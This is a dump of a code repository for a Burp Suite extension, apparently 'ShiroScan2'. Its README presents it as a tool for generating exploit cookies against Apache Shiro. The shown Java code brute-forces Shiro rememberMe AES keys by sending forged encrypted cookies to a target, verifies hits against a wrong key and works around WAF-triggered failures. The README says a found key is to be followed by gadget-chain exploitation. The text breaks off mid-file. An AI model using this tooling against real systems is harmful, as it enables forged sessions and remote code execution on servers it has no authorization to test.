├── README.md
├── images
├── 1.png
├── 2.png
├── 3.png
├── 4.png
├── 5.png
├── 6.png
├── 7.png
├── 8.png
└── 9.png
├── pom.xml
├── src
└── main
│ ├── java
│ └── burp
│ │ ├── Application
│ │ ├── ShiroCipherKeyExtension
│ │ │ ├── ExtensionInterface
│ │ │ │ ├── AShiroCipherKeyExtension.java
│ │ │ │ └── IShiroCipherKeyExtension.java
│ │ │ ├── ExtensionMethod
│ │ │ │ └── ShiroCipherKeyScan.java
│ │ │ ├── ShiroCipherKey.java
│ │ │ └── ShiroCipherKeyThread.java
│ │ └── ShiroFingerprintExtension
│ │ │ ├── ExtensionInterface
│ │ │ ├── AShiroFingerprintExtension.java
│ │ │ └── IShiroFingerprintExtension.java
│ │ │ ├── ExtensionMethod
│ │ │ ├── ShiroFingerprint1.java
│ │ │ ├── ShiroFingerprint2.java
│ │ │ └── ShiroFingerprint3.java
│ │ │ └── ShiroFingerprint.java
│ │ ├── Bootstrap
│ │ ├── CustomBurpHelpers.java
│ │ ├── CustomBurpUrl.java
│ │ ├── CustomHelpers.java
│ │ ├── DiffPage.java
│ │ ├── Encrypt
│ │ │ ├── CbcEncrypt.java
│ │ │ ├── EncryptInterface.java
│ │ │ └── GcmEncrypt.java
│ │ ├── GlobalPassiveScanVariableReader.java
│ │ ├── GlobalVariableReader.java
│ │ └── YamlReader.java
│ │ ├── BurpExtender.java
│ │ ├── Config.java
│ │ ├── ConfigDlg.java
│ │ ├── CustomErrorException
│ │ ├── DiffPageException.java
│ │ └── TaskTimeoutException.java
│ │ ├── CustomScanIssue.java
│ │ ├── Encrypt.java
│ │ ├── Menu.java
│ │ ├── Ui
│ │ ├── BaseSettingTag.java
│ │ ├── ScanQueueTag.java
│ │ └── Tags.java
│ │ └── Utils.java
│ └── resources
│ └── config.yml
└── target
├── BurpShiroPassiveScan-2.0.0.jar
├── BurpShiroPassiveScan.rar
├── BurpShiroPassiveScan
├── BurpShiroPassiveScan.jar
└── resources
│ └── config.yml
├── classes
├── burp
│ ├── Application
│ │ ├── ShiroCipherKeyExtension
│ │ │ ├── ExtensionInterface
│ │ │ │ ├── AShiroCipherKeyExtension.class
│ │ │ │ └── IShiroCipherKeyExtension.class
│ │ │ ├── ExtensionMethod
│ │ │ │ └── ShiroCipherKeyScan.class
│ │ │ ├── ShiroCipherKey.class
│ │ │ └── ShiroCipherKeyThread.class
│ │ └── ShiroFingerprintExtension
│ │ │ ├── ExtensionInterface
│ │ │ ├── AShiroFingerprintExtension.class
│ │ │ └── IShiroFingerprintExtension.class
│ │ │ ├── ExtensionMethod
│ │ │ ├── ShiroFingerprint1.class
│ │ │ ├── ShiroFingerprint2.class
│ │ │ └── ShiroFingerprint3.class
│ │ │ └── ShiroFingerprint.class
│ ├── Bootstrap
│ │ ├── CustomBurpHelpers.class
│ │ ├── CustomBurpUrl.class
│ │ ├── CustomHelpers.class
│ │ ├── DiffPage.class
│ │ ├── Encrypt
│ │ │ ├── CbcEncrypt.class
│ │ │ ├── EncryptInterface.class
│ │ │ └── GcmEncrypt.class
│ │ ├── GlobalPassiveScanVariableReader.class
│ │ ├── GlobalVariableReader.class
│ │ └── YamlReader.class
│ ├── BurpExtender.class
│ ├── Config.class
│ ├── ConfigDlg$1.class
│ ├── ConfigDlg.class
│ ├── CustomErrorException
│ │ ├── DiffPageException.class
│ │ └── TaskTimeoutException.class
│ ├── CustomScanIssue.class
│ ├── Encrypt.class
│ ├── Menu$1.class
│ ├── Menu$2.class
│ ├── Menu$3.class
│ ├── Menu$4.class
│ ├── Menu$5.class
│ ├── Menu$6.class
│ ├── Menu$7.class
│ ├── Menu.class
│ ├── Ui
│ │ ├── BaseSettingTag.class
│ │ ├── ScanQueueTag$TablesData.class
│ │ ├── ScanQueueTag$URLTable.class
│ │ ├── ScanQueueTag.class
│ │ └── Tags.class
│ ├── Utils$SilentURLStreamHandler.class
│ └── Utils.class
└── config.yml
├── maven-archiver
└── pom.properties
└── maven-status
└── maven-compiler-plugin
└── compile
└── default-compile
├── createdFiles.lst
└── inputFiles.lst
/README.md:
--------------------------------------------------------------------------------
1 | ## ShiroScan2
2 | 基于[BurpShiroPassiveScan](https://github.com/pmiaowu/BurpShiroPassiveScan)项目修改增加了Xray回显链生成,修改的目的很简单,就是当pmiaowu大佬的插件检测出漏洞后,自己生成cookie验证下,进一步利用还得是ShiroAttack这类工具
3 |
4 | ## 编译方法
5 | 参考[BurpShiroPassiveScan](https://github.com/pmiaowu/BurpShiroPassiveScan#%E7%BC%96%E8%AF%91%E6%96%B9%E6%B3%95)
6 |
7 | ## 功能
8 | 在Repeater界面右键
9 |
10 | 
11 |
12 | 点击Config输入key,选择加密模式并保存,支持CBC和GCM两种
13 |
14 | 
15 |
16 | 选择利用链,自动生成Cookie
17 |
18 | 
19 |
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/1.png
--------------------------------------------------------------------------------
/images/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/2.png
--------------------------------------------------------------------------------
/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/3.png
--------------------------------------------------------------------------------
/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/4.png
--------------------------------------------------------------------------------
/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/5.png
--------------------------------------------------------------------------------
/images/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/6.png
--------------------------------------------------------------------------------
/images/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/7.png
--------------------------------------------------------------------------------
/images/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/8.png
--------------------------------------------------------------------------------
/images/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/images/9.png
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | com.github.pmiaowu
8 | BurpShiroPassiveScan
9 | 2.0.0
10 |
11 |
12 |
13 |
14 | net.portswigger.burp.extender
15 | burp-extender-api
16 | 2.3
17 |
18 |
19 |
20 |
21 | org.yaml
22 | snakeyaml
23 | 1.29
24 |
25 |
26 |
27 |
28 | org.apache.httpcomponents
29 | httpclient
30 | 4.5.13
31 |
32 |
33 |
34 |
35 | org.apache.shiro
36 | shiro-core
37 | 1.2.4
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 | org.apache.maven.plugins
46 | maven-compiler-plugin
47 | 3.8.1
48 |
49 | 1.8
50 | 1.8
51 | UTF-8
52 |
53 |
54 |
55 | org.apache.maven.plugins
56 | maven-assembly-plugin
57 | 3.3.0
58 |
59 |
60 | BurpShiroPassiveScan
61 | false
62 |
63 |
64 | burp.BurpExtender
65 |
66 |
67 |
68 | jar-with-dependencies
69 |
70 |
71 | ${project.build.directory}/BurpShiroPassiveScan
72 |
73 |
74 |
75 |
76 |
77 |
78 | make-assembly
79 | package
80 |
81 | single
82 |
83 |
84 |
85 |
86 |
87 | org.apache.maven.plugins
88 | maven-resources-plugin
89 | 3.2.0
90 |
91 |
92 | copy-resources
93 | package
94 |
95 | copy-resources
96 |
97 |
98 | ${project.build.directory}/BurpShiroPassiveScan/resources
99 |
100 |
101 | src/main/resources
102 |
103 | **/*
104 |
105 | true
106 |
107 |
108 | UTF-8
109 |
110 |
111 |
112 |
113 |
114 |
115 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroCipherKeyExtension.ExtensionInterface;
2 |
3 | import burp.IHttpRequestResponse;
4 |
5 | public abstract class AShiroCipherKeyExtension implements IShiroCipherKeyExtension {
6 | private String extensionName = "";
7 |
8 | private String cipherKey = "";
9 |
10 | private String encryptMethod = "";
11 |
12 | private Boolean isShiroCipherKeyExists = false;
13 |
14 | private IHttpRequestResponse newHttpRequestResponse;
15 |
16 | /**
17 | * 设置扩展名称 (必须的)
18 | *
19 | * @param value
20 | */
21 | protected void setExtensionName(String value) {
22 | if (value == null || value.isEmpty()) {
23 | throw new IllegalArgumentException("shiro加密key检测扩展-扩展名称不能为空");
24 | }
25 | this.extensionName = value;
26 | }
27 |
28 | /**
29 | * 扩展名称检查
30 | * 作用: 让所有不设置扩展名称的扩展无法正常使用, 防止直接调用本类的其他方法, 保证扩展的正常
31 | */
32 | private void extensionNameCheck() {
33 | if (this.extensionName == null || this.extensionName.isEmpty()) {
34 | throw new IllegalArgumentException("请为该shiro加密key检测扩展-设置扩展名称");
35 | }
36 | }
37 |
38 | /**
39 | * 获取扩展名称
40 | *
41 | * @return String
42 | */
43 | @Override
44 | public String getExtensionName() {
45 | this.extensionNameCheck();
46 | return this.extensionName;
47 | }
48 |
49 | /**
50 | * 设置为扫描出了shiro加密的密钥key
51 | */
52 | protected void setShiroCipherKeyExists() {
53 | this.extensionNameCheck();
54 | this.isShiroCipherKeyExists = true;
55 | }
56 |
57 | /**
58 | * 是否存在 shiro加密的密钥key
59 | * true 表示 成功扫描出key
60 | * false 表示 未能成功扫描出key
61 | *
62 | * @return Boolean
63 | */
64 | @Override
65 | public Boolean isShiroCipherKeyExists() {
66 | this.extensionNameCheck();
67 | return this.isShiroCipherKeyExists;
68 | }
69 |
70 | /**
71 | * 设置程序使用的加密方法
72 | */
73 | protected void setEncryptMethod(String value) {
74 | this.extensionNameCheck();
75 | this.encryptMethod = value;
76 | }
77 |
78 | /**
79 | * 获取加密的方法
80 | * 例如返回: cbc, gcm 加密算法
81 | *
82 | * @return String
83 | */
84 | @Override
85 | public String getEncryptMethod() {
86 | this.extensionNameCheck();
87 | return this.encryptMethod;
88 | }
89 |
90 | /**
91 | * 设置加密的密钥key
92 | *
93 | * @param value
94 | */
95 | public void setCipherKey(String value) {
96 | this.extensionNameCheck();
97 | this.cipherKey = value;
98 | }
99 |
100 | /**
101 | * 获取加密的密钥key
102 | *
103 | * @return String
104 | */
105 | @Override
106 | public String getCipherKey() {
107 | this.extensionNameCheck();
108 | return this.cipherKey;
109 | }
110 |
111 | /**
112 | * 设置http请求与响应对象
113 | *
114 | * @param httpRequestResponse
115 | */
116 | protected void setHttpRequestResponse(IHttpRequestResponse httpRequestResponse) {
117 | this.extensionNameCheck();
118 | this.newHttpRequestResponse = httpRequestResponse;
119 | }
120 |
121 | /**
122 | * 获取http请求与响应对象
123 | *
124 | * @return IHttpRequestResponse
125 | */
126 | @Override
127 | public IHttpRequestResponse getHttpRequestResponse() {
128 | this.extensionNameCheck();
129 | return this.newHttpRequestResponse;
130 | }
131 | }
132 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroCipherKeyExtension.ExtensionInterface;
2 |
3 | import burp.IScanIssue;
4 | import burp.IHttpRequestResponse;
5 |
6 | /**
7 | * shiro加密key扩展的公共接口
8 | * 所有的抽象类都要继承它并实现所有的接口
9 | */
10 | public interface IShiroCipherKeyExtension {
11 | String getExtensionName();
12 |
13 | Boolean isShiroCipherKeyExists();
14 |
15 | String getEncryptMethod();
16 |
17 | String getCipherKey();
18 |
19 | IHttpRequestResponse getHttpRequestResponse();
20 |
21 | IScanIssue export();
22 |
23 | void consoleExport();
24 | }
25 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroCipherKeyExtension.ExtensionMethod;
2 |
3 | import java.net.URL;
4 | import java.util.Date;
5 | import java.util.List;
6 | import java.io.IOException;
7 | import java.io.PrintWriter;
8 |
9 | import org.apache.shiro.subject.SimplePrincipalCollection;
10 |
11 | import burp.*;
12 |
13 | import burp.Bootstrap.*;
14 | import burp.Bootstrap.Encrypt.EncryptInterface;
15 |
16 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.AShiroCipherKeyExtension;
17 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;
18 |
19 | import burp.CustomErrorException.DiffPageException;
20 | import burp.CustomErrorException.TaskTimeoutException;
21 |
22 | public class ShiroCipherKeyScan extends AShiroCipherKeyExtension {
23 | private GlobalVariableReader globalVariableReader;
24 | private GlobalPassiveScanVariableReader globalPassiveScanVariableReader;
25 |
26 | private IBurpExtenderCallbacks callbacks;
27 | private IExtensionHelpers helpers;
28 | private PrintWriter stdout;
29 |
30 | private YamlReader yamlReader;
31 |
32 | private IHttpRequestResponse baseRequestResponse;
33 |
34 | private ShiroFingerprint shiroFingerprint;
35 |
36 | private List payloads;
37 |
38 | private EncryptInterface encryptClass;
39 |
40 | private Date startDate;
41 |
42 | private Integer maxExecutionTime;
43 |
44 | private CustomBurpHelpers customBurpHelpers;
45 |
46 | private double similarityRatio;
47 |
48 | // 相似度匹配算法,匹配失败的次数
49 | private int errorNumber = 0;
50 | private int endErrorNumber = 10;
51 |
52 | private IHttpRequestResponse shiroFingerprintHttpRequestResponse;
53 |
54 | private String rememberMeCookieName;
55 |
56 | private String responseRememberMeCookieValue;
57 |
58 | private String newRequestRememberMeCookieValue;
59 |
60 | public ShiroCipherKeyScan(GlobalVariableReader globalVariableReader,
61 | GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
62 | IBurpExtenderCallbacks callbacks,
63 | YamlReader yamlReader,
64 | IHttpRequestResponse baseRequestResponse,
65 | ShiroFingerprint shiroFingerprint,
66 | List payloads,
67 | EncryptInterface encryptClass,
68 | Date startDate,
69 | Integer maxExecutionTime) throws IOException {
70 | this.globalVariableReader = globalVariableReader;
71 | this.globalPassiveScanVariableReader = globalPassiveScanVariableReader;
72 |
73 | this.callbacks = callbacks;
74 | this.helpers = callbacks.getHelpers();
75 | this.stdout = new PrintWriter(callbacks.getStdout(), true);
76 |
77 | this.yamlReader = yamlReader;
78 | this.baseRequestResponse = baseRequestResponse;
79 | this.shiroFingerprint = shiroFingerprint;
80 | this.payloads = payloads;
81 | this.encryptClass = encryptClass;
82 | this.startDate = startDate;
83 | this.maxExecutionTime = maxExecutionTime;
84 |
85 | this.customBurpHelpers = new CustomBurpHelpers(this.callbacks);
86 |
87 | this.similarityRatio = yamlReader.getDouble("application.shiroCipherKeyExtension.config.similarityRatio");
88 |
89 | this.shiroFingerprintHttpRequestResponse = this.shiroFingerprint.run().getHttpRequestResponse();
90 |
91 | this.rememberMeCookieName = this.shiroFingerprint.run().getResponseDefaultRememberMeCookieName();
92 | this.responseRememberMeCookieValue = this.shiroFingerprint.run().getResponseDefaultRememberMeCookieValue();
93 | this.newRequestRememberMeCookieValue = "";
94 |
95 | this.setExtensionName("ShiroCipherKeyScan");
96 |
97 | this.runExtension();
98 | }
99 |
100 | private void runExtension() throws IOException {
101 | if (this.payloads.size() <= 0) {
102 | throw new IllegalArgumentException("shiro加密key检测扩展-要进行爆破的payloads不能为空, 请检查");
103 | }
104 |
105 | byte[] exp = this.encryptClass.getBytes(new SimplePrincipalCollection());
106 |
107 | // 加密key检测
108 | for (String key : this.payloads) {
109 | // 这个参数为true说明插件已经被卸载,退出所有任务,避免继续扫描
110 | if (this.globalVariableReader.getBooleanData("isExtensionUnload")) {
111 | return;
112 | }
113 |
114 | // 说明别的线程已经扫描到shiro key了,可以退出这个线程了
115 | if (this.globalPassiveScanVariableReader.getBooleanData("isEndShiroCipherKeyTask")) {
116 | return;
117 | }
118 |
119 | // 说明检测到shiro key了
120 | if (this.isShiroCipherKeyExists()) {
121 | return;
122 | }
123 |
124 | // 如果 相似度匹配算法,匹配失败的次数,超过10次,那么就可以退出了
125 | // 因为这种情况下,大概率触发waf规则了, 那么就没必要跑剩下的了
126 | if (this.errorNumber >= this.endErrorNumber) {
127 | // 抛异常结束任务
128 | throw new DiffPageException("shiro key scan too many errors");
129 | }
130 |
131 | // 判断程序是否运行超时
132 | int startTime = CustomHelpers.getSecondTimestamp(this.startDate);
133 | int currentTime = CustomHelpers.getSecondTimestamp(new Date());
134 | int runTime = currentTime - startTime;
135 | if (runTime >= this.maxExecutionTime) {
136 | throw new TaskTimeoutException("shiro key scan task timeout");
137 | }
138 |
139 | this.cipherKeyDetection(key, exp);
140 | }
141 | }
142 |
143 | /**
144 | * 加密key检测
145 | *
146 | * @param key 要爆破的key
147 | * @param exp 加密的算法类byte
148 | */
149 | private void cipherKeyDetection(String key, byte[] exp) {
150 | int shiroFingerprintCookieRememberMeNumber = this.getHttpCookieRememberMeNumber(this.shiroFingerprintHttpRequestResponse);
151 | String shiroFingerprintHttpBody = this.customBurpHelpers.getHttpResponseBody(this.shiroFingerprintHttpRequestResponse.getResponse());
152 |
153 | // 使用当前可能正确的key-发送可能被此shiro框架成功解密的请求
154 | String correctRememberMe = this.encryptClass.encrypt(key, exp);
155 | IHttpRequestResponse newHttpRequestResponse1 = this.getNewHttpRequestResponse(correctRememberMe, 3);
156 |
157 | // 判断shiro指纹的请求与当前可能正确key的请求相似度是否差不多一致
158 | String newHttpBody1 = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse1.getResponse());
159 | double htmlSimilarityRatio1 = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody1);
160 | if (this.similarityRatio > htmlSimilarityRatio1) {
161 | this.errorNumber++;
162 | return;
163 | }
164 |
165 | // 判断当前可能正确的请求-是否被此shiro框架解密
166 | int newHttpCookieRememberMeNumber1 = this.getHttpCookieRememberMeNumber(newHttpRequestResponse1);
167 | if (newHttpCookieRememberMeNumber1 >= shiroFingerprintCookieRememberMeNumber) {
168 | return;
169 | }
170 |
171 | // 二次验证-这样可以减少因为waf造成的大量误报
172 | // 使用一个必定错误的key-发送一个肯定不会被此shiro框架成功解密的请求
173 | // 密钥 errorKey 然后 aes 加密 == U2FsdGVkX19xgIigFNCsuy2aXwtskOnJV8rQkrT9D5Y=
174 | String errorKey = "U2FsdGVkX19xgIigFNCsuy2aXwtskOnJV8rQkrT9D5Y=";
175 | String errorRememberMe = this.encryptClass.encrypt(errorKey, exp);
176 | IHttpRequestResponse newHttpRequestResponse2 = this.getNewHttpRequestResponse(errorRememberMe, 3);
177 |
178 | // 判断shiro指纹的请求与当前必定错误的请求相似度是否差不多一致
179 | String newHttpBody2 = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse2.getResponse());
180 | double htmlSimilarityRatio2 = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody2);
181 | if (this.similarityRatio > htmlSimilarityRatio2) {
182 | this.errorNumber++;
183 | return;
184 | }
185 |
186 | // 判断当前必定错误的请求-是否被此shiro框架解密
187 | int newHttpCookieRememberMeNumber2 = this.getHttpCookieRememberMeNumber(newHttpRequestResponse2);
188 | if (newHttpCookieRememberMeNumber2 < shiroFingerprintCookieRememberMeNumber) {
189 | return;
190 | }
191 |
192 | // 设置问题详情
193 | this.setIssuesDetail(newHttpRequestResponse1, key, this.encryptClass.getName(), correctRememberMe);
194 | }
195 |
196 | /**
197 | * 获取http cookie 记住我出现的次数
198 | *
199 | * @param httpRequestResponse
200 | * @return
201 | */
202 | private int getHttpCookieRememberMeNumber(IHttpRequestResponse httpRequestResponse) {
203 | int number = 0;
204 | for (ICookie c : this.helpers.analyzeResponse(httpRequestResponse.getResponse()).getCookies()) {
205 | if (c.getName().equals(this.rememberMeCookieName)) {
206 | if (c.getValue().equals(this.responseRememberMeCookieValue) || c.getValue().equals("deleteMe")) {
207 | number++;
208 | }
209 | }
210 | }
211 | return number;
212 | }
213 |
214 | /**
215 | * 获取新的http请求响应
216 | *
217 | * @param rememberMe
218 | * @param remainingRunNumber 剩余运行次数
219 | * @return IHttpRequestResponse
220 | */
221 | private IHttpRequestResponse getNewHttpRequestResponse(String rememberMe, int remainingRunNumber) {
222 | IHttpService httpService = this.baseRequestResponse.getHttpService();
223 | IParameter newParameter = this.helpers.buildParameter(
224 | this.rememberMeCookieName,
225 | rememberMe,
226 | (byte) 2);
227 | byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter);
228 | IHttpRequestResponse newHttpRequestResponse = this.callbacks.makeHttpRequest(httpService, newRequest);
229 |
230 | if (remainingRunNumber <= 1) {
231 | return newHttpRequestResponse;
232 | }
233 | remainingRunNumber--;
234 |
235 | String shiroFingerprintHttpBody = this.customBurpHelpers.getHttpResponseBody(this.shiroFingerprintHttpRequestResponse.getResponse());
236 | String newHttpBody = this.customBurpHelpers.getHttpResponseBody(newHttpRequestResponse.getResponse());
237 |
238 | double htmlSimilarityRatio = DiffPage.getRatio(shiroFingerprintHttpBody, newHttpBody);
239 | if (this.similarityRatio > htmlSimilarityRatio) {
240 | return this.getNewHttpRequestResponse(rememberMe, remainingRunNumber);
241 | }
242 |
243 | return newHttpRequestResponse;
244 | }
245 |
246 | /**
247 | * 设置问题详情
248 | */
249 | private void setIssuesDetail(
250 | IHttpRequestResponse httpRequestResponse,
251 | String key,
252 | String encryptMethod,
253 | String correctRememberMe) {
254 | this.setShiroCipherKeyExists();
255 | this.setCipherKey(key);
256 | this.setEncryptMethod(encryptMethod);
257 | this.setHttpRequestResponse(httpRequestResponse);
258 | this.setNewRequestRememberMeCookieValue(correctRememberMe);
259 | }
260 |
261 | private void setNewRequestRememberMeCookieValue(String value) {
262 | this.newRequestRememberMeCookieValue = value;
263 | }
264 |
265 | private String getNewRequestRememberMeCookieValue() {
266 | return this.newRequestRememberMeCookieValue;
267 | }
268 |
269 | @Override
270 | public IScanIssue export() {
271 | if (!this.isShiroCipherKeyExists()) {
272 | return null;
273 | }
274 |
275 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
276 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();
277 |
278 | String str1 = String.format("
=============ShiroCipherKeyDetail============
");
279 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName());
280 | String str3 = String.format("EncryptMethod: %s
", this.encryptClass.getName());
281 | String str4 = String.format("CookieName: %s
", this.rememberMeCookieName);
282 | String str5 = String.format("CookieValue: %s
", this.getNewRequestRememberMeCookieValue());
283 | String str6 = String.format("ShiroCipherKey: %s
", this.getCipherKey());
284 | String str7 = String.format("=====================================
");
285 |
286 | String detail = str1 + str2 + str3 + str4 + str5 + str6 + str7;
287 |
288 | String shiroCipherKeyIssueName = this.yamlReader.getString("application.shiroCipherKeyExtension.config.issueName");
289 |
290 | return new CustomScanIssue(
291 | newHttpRequestUrl,
292 | shiroCipherKeyIssueName,
293 | 0,
294 | "High",
295 | "Certain",
296 | null,
297 | null,
298 | detail,
299 | null,
300 | new IHttpRequestResponse[]{newHttpRequestResponse},
301 | newHttpRequestResponse.getHttpService()
302 | );
303 | }
304 |
305 | @Override
306 | public void consoleExport() {
307 | if (!this.isShiroCipherKeyExists()) {
308 | return;
309 | }
310 |
311 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
312 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();
313 | String newHttpRequestMethod = this.helpers.analyzeRequest(newHttpRequestResponse.getRequest()).getMethod();
314 | int newHttpResponseStatusCode = this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getStatusCode();
315 |
316 | this.stdout.println("");
317 | this.stdout.println("===========shiro加密key详情============");
318 | this.stdout.println("你好呀~ (≧ω≦*)喵~");
319 | this.stdout.println("这边检测到有一个站点使用了 shiro框架 喵~");
320 | this.stdout.println(String.format(
321 | "注意: 该检测方法, 正确的时候响应包的 %s 会消失, 这表示当前key是正确的",
322 | this.rememberMeCookieName));
323 | this.stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
324 | this.stdout.println(String.format("使用的加密方法: %s", this.encryptClass.getName()));
325 | this.stdout.println(String.format("url: %s", newHttpRequestUrl));
326 | this.stdout.println(String.format("请求方法: %s", newHttpRequestMethod));
327 | this.stdout.println(String.format("页面http状态: %d", newHttpResponseStatusCode));
328 | this.stdout.println(String.format("对应的Cookie键: %s", this.rememberMeCookieName));
329 | this.stdout.println(String.format("对应的Cookie值: %s", this.getNewRequestRememberMeCookieValue()));
330 | this.stdout.println(String.format("Shiro加密key: %s", this.getCipherKey()));
331 | this.stdout.println("详情请查看-Burp Scanner模块-Issue activity界面");
332 | this.stdout.println("===================================");
333 | this.stdout.println("");
334 | }
335 | }
336 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroCipherKeyExtension;
2 |
3 | import java.util.Date;
4 | import java.util.List;
5 | import java.io.PrintWriter;
6 | import java.lang.reflect.Constructor;
7 | import java.lang.reflect.InvocationTargetException;
8 |
9 | import burp.Bootstrap.GlobalPassiveScanVariableReader;
10 | import burp.IHttpRequestResponse;
11 | import burp.IBurpExtenderCallbacks;
12 |
13 | import burp.Bootstrap.YamlReader;
14 | import burp.Bootstrap.GlobalVariableReader;
15 | import burp.Bootstrap.Encrypt.CbcEncrypt;
16 | import burp.Bootstrap.Encrypt.GcmEncrypt;
17 | import burp.Bootstrap.Encrypt.EncryptInterface;
18 |
19 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;
20 |
21 | import burp.Application.ShiroCipherKeyExtension.ExtensionInterface.IShiroCipherKeyExtension;
22 |
23 | public class ShiroCipherKey implements Runnable {
24 | private GlobalVariableReader globalVariableReader;
25 | private GlobalPassiveScanVariableReader globalPassiveScanVariableReader;
26 |
27 | private IBurpExtenderCallbacks callbacks;
28 |
29 | private YamlReader yamlReader;
30 |
31 | private IHttpRequestResponse baseRequestResponse;
32 |
33 | private ShiroFingerprint shiroFingerprint;
34 |
35 | private String callClassName;
36 |
37 | private List payloadList;
38 |
39 | /**
40 | * 该模块启动日期
41 | */
42 | private final Date startDate = new Date();
43 |
44 | /**
45 | * 程序最大执行时间,单位为秒
46 | * 注意: 会根据payload的添加而添加
47 | */
48 | private final int maxExecutionTime = 60;
49 |
50 | public ShiroCipherKey(GlobalVariableReader globalVariableReader,
51 | GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
52 | IBurpExtenderCallbacks callbacks,
53 | YamlReader yamlReader,
54 | IHttpRequestResponse baseRequestResponse,
55 | ShiroFingerprint shiroFingerprint,
56 | String callClassName,
57 | List payloadList) {
58 | this.globalVariableReader = globalVariableReader;
59 | this.globalPassiveScanVariableReader = globalPassiveScanVariableReader;
60 |
61 | this.callbacks = callbacks;
62 |
63 | this.yamlReader = yamlReader;
64 |
65 | this.baseRequestResponse = baseRequestResponse;
66 |
67 | this.shiroFingerprint = shiroFingerprint;
68 |
69 | this.callClassName = callClassName;
70 |
71 | this.payloadList = payloadList;
72 | }
73 |
74 | @Override
75 | public void run() {
76 | if (callClassName == null || callClassName.length() <= 0) {
77 | throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-请输入要调用的插件名称");
78 | }
79 |
80 | if (this.payloadList.size() == 0) {
81 | throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-获取的payloads为空,无法正常运行");
82 | }
83 |
84 | try {
85 | Class c = Class.forName("burp.Application.ShiroCipherKeyExtension.ExtensionMethod." + callClassName);
86 | Constructor cConstructor = c.getConstructor(
87 | GlobalVariableReader.class,
88 | GlobalPassiveScanVariableReader.class,
89 | IBurpExtenderCallbacks.class,
90 | YamlReader.class,
91 | IHttpRequestResponse.class,
92 | ShiroFingerprint.class,
93 | List.class,
94 | EncryptInterface.class,
95 | Date.class,
96 | Integer.class);
97 |
98 | Boolean isScanCbcEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanCbcEncrypt");
99 | if (isScanCbcEncrypt) {
100 | if (this.globalPassiveScanVariableReader.getBooleanData("isEndShiroCipherKeyTask")) {
101 | return;
102 | }
103 |
104 | IShiroCipherKeyExtension shiroCipherKey1 = (IShiroCipherKeyExtension) cConstructor.newInstance(
105 | this.globalVariableReader,
106 | this.globalPassiveScanVariableReader,
107 | this.callbacks,
108 | this.yamlReader,
109 | this.baseRequestResponse,
110 | this.shiroFingerprint,
111 | this.payloadList,
112 | new CbcEncrypt(),
113 | this.startDate,
114 | this.getMaxExecutionTime());
115 |
116 | if (shiroCipherKey1.isShiroCipherKeyExists()) {
117 | this.globalPassiveScanVariableReader.putBooleanData("isEndShiroCipherKeyTask", true);
118 | this.globalPassiveScanVariableReader.putShiroCipherKeyExtensionData("shiroCipherKey", shiroCipherKey1);
119 | }
120 | }
121 |
122 | Boolean isScanGcmEncrypt = this.yamlReader.getBoolean("application.shiroCipherKeyExtension.config.isScanGcmEncrypt");
123 | if (isScanGcmEncrypt) {
124 | if (this.globalPassiveScanVariableReader.getBooleanData("isEndShiroCipherKeyTask")) {
125 | return;
126 | }
127 |
128 | IShiroCipherKeyExtension shiroCipherKey2 = (IShiroCipherKeyExtension) cConstructor.newInstance(
